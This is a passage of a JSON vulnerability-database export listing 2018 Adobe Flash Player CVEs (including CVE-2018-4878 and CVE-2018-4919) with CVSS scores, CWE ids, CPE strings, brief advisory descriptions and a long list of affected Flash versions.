"cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878"], "modified": "2019-08-05T00:00:00", "id": "CPAI-2018-0052", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:31:11", "description": "A type confusion vulnerability exists in Adobe Flash Player. The vulnerability is due to an error in Adobe Flash Player while parsing a specially crafted file. A remote attacker can exploit this issue by enticing a victim to open a specially crafted file.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-09T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Out-of-bounds Read (APSB18-01: CVE-2018-4871)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2018-01-09T00:00:00", "id": "CPAI-2018-0016", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ubuntucve": [{"lastseen": "2022-11-19T14:36:43", "description": "Adobe Flash Player versions 28.0.0.161 and earlier have an exploitable use\nafter free vulnerability. Successful exploitation could lead to arbitrary\ncode execution in the context of the current user.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-05-19T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4919", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919"], "modified": "2018-05-19T00:00:00", "id": "UB:CVE-2018-4919", "href": "https://ubuntu.com/security/CVE-2018-4919", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-19T14:36:43", "description": "Adobe Flash Player versions 28.0.0.161 and earlier have an exploitable type\nconfusion vulnerability. Successful exploitation could lead to arbitrary\ncode execution in the context of the current user.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-05-19T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4920", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4920"], "modified": "2018-05-19T00:00:00", "id": "UB:CVE-2018-4920", "href": "https://ubuntu.com/security/CVE-2018-4920", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T13:52:33", "description": "A use-after-free vulnerability was discovered in Adobe Flash Player before\n28.0.0.161. This vulnerability occurs due to a dangling pointer in the\nPrimetime SDK related to media player's quality of service functionality. A\nsuccessful attack can lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-06T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4877", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877"], "modified": "2018-02-06T00:00:00", "id": "UB:CVE-2018-4877", "href": "https://ubuntu.com/security/CVE-2018-4877", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T13:52:32", "description": "A use-after-free vulnerability was discovered in Adobe Flash Player before\n28.0.0.161. This vulnerability occurs due to a dangling pointer in the\nPrimetime SDK related to media player handling of listener objects. A\nsuccessful attack can lead to arbitrary code execution. This was exploited\nin the wild in January and February 2018.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-06T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4878", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878"], "modified": "2018-02-06T00:00:00", "id": "UB:CVE-2018-4878", "href": "https://ubuntu.com/security/CVE-2018-4878", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-11-18T17:18:08", "description": "Adobe Flash Player versions 28.0.0.161 and earlier have an exploitable use after free vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-05-19T17:29:00", "type": "cve", "title": "CVE-2018-4919", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919"], "modified": "2022-11-18T16:25:00", "cpe": ["cpe:/a:adobe:flash_player_desktop_runtime:28.0.0.161", "cpe:/a:adobe:flash_player:28.0.0.161"], "id": "CVE-2018-4919", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4919", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:28.0.0.161:*:*:*:*:chrome:*:*", "cpe:2.3:a:adobe:flash_player_desktop_runtime:28.0.0.161:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:28.0.0.161:*:*:*:*:edge:*:*", "cpe:2.3:a:adobe:flash_player:28.0.0.161:*:*:*:*:internet_explorer:*:*"]}, {"lastseen": "2022-11-18T17:18:05", "description": "Adobe Flash Player versions 28.0.0.161 and earlier have an exploitable type confusion vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-05-19T17:29:00", "type": "cve", "title": "CVE-2018-4920", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4920"], "modified": "2022-11-18T16:25:00", "cpe": ["cpe:/a:adobe:flash_player_desktop_runtime:28.0.0.161", "cpe:/a:adobe:flash_player:28.0.0.161"], "id": "CVE-2018-4920", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4920", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:28.0.0.161:*:*:*:*:chrome:*:*", "cpe:2.3:a:adobe:flash_player_desktop_runtime:28.0.0.161:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:28.0.0.161:*:*:*:*:edge:*:*", "cpe:2.3:a:adobe:flash_player:28.0.0.161:*:*:*:*:internet_explorer:*:*"]}, {"lastseen": "2022-03-23T17:37:10", "description": "A use-after-free vulnerability was discovered in Adobe Flash Player before 28.0.0.161. This vulnerability occurs due to a dangling pointer in the Primetime SDK related to media player's quality of service functionality. A successful attack can lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-06T21:29:00", "type": "cve", "title": "CVE-2018-4877", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877"], "modified": "2021-09-08T17:21:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0"], "id": "CVE-2018-4877", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4877", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-18T16:32:58", "description": "A use-after-free vulnerability was discovered in Adobe Flash Player before 28.0.0.161. This vulnerability occurs due to a dangling pointer in the Primetime SDK related to media player handling of listener objects. A successful attack can lead to arbitrary code execution. This was exploited in the wild in January and February 2018.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-06T21:29:00", "type": "cve", "title": "CVE-2018-4878", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878"], "modified": "2022-04-18T14:26:00", "cpe": ["cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0"], "id": "CVE-2018-4878", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4878", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T17:37:06", "description": "An Out-of-bounds Read issue was discovered in Adobe Flash Player before 28.0.0.137. This vulnerability occurs because of computation that reads data that is past the end of the target buffer. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-09T21:29:00", "type": "cve", "title": "CVE-2018-4871", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2021-09-08T17:21:00", "cpe": ["cpe:/a:adobe:flash_player:28.0.0.126", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0"], "id": "CVE-2018-4871", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4871", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:28.0.0.126:*:*:*:*:internet_explorer_11:*:*", "cpe:2.3:a:adobe:flash_player:28.0.0.126:*:*:*:*:edge:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:28.0.0.126:*:*:*:*:chrome:*:*", "cpe:2.3:a:adobe:flash_player:28.0.0.126:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2021-06-08T18:46:01", "description": "### Description\n\nAdobe Flash Player is prone to an unspecified remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Successful exploitation could potentially allow an attacker to take control of the affected system. Adobe Flash Player version 28.0.0.161 and prior versions are vulnerable.\n\n### Technologies Affected\n\n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.18 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.411 \n * Adobe Flash Player 11.2.202.418 \n * Adobe Flash Player 11.2.202.424 \n * Adobe Flash Player 11.2.202.425 \n * Adobe Flash Player 11.2.202.429 \n * Adobe Flash Player 11.2.202.438 \n * Adobe Flash Player 11.2.202.440 \n * Adobe Flash Player 11.2.202.442 \n * Adobe Flash Player 11.2.202.451 \n * Adobe Flash Player 11.2.202.457 \n * Adobe Flash Player 11.2.202.460 \n * Adobe Flash Player 11.2.202.466 \n * Adobe Flash Player 11.2.202.468 \n * Adobe Flash Player 11.2.202.481 \n * Adobe Flash Player 11.2.202.491 \n * Adobe Flash Player 11.2.202.508 \n * Adobe Flash Player 11.2.202.521 \n * Adobe Flash Player 11.2.202.535 \n * Adobe Flash Player 11.2.202.540 \n * Adobe Flash Player 11.2.202.548 \n * Adobe Flash Player 11.2.202.554 \n * Adobe Flash Player 11.2.202.559 \n * Adobe Flash Player 11.2.202.569 \n * Adobe Flash Player 11.2.202.577 \n * Adobe Flash Player 11.2.202.616 \n * Adobe Flash Player 11.2.202.621 \n * Adobe Flash Player 11.2.202.626 \n * Adobe Flash Player 11.2.202.632 \n * Adobe Flash Player 11.2.202.635 \n * Adobe Flash Player 11.2.202.644 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 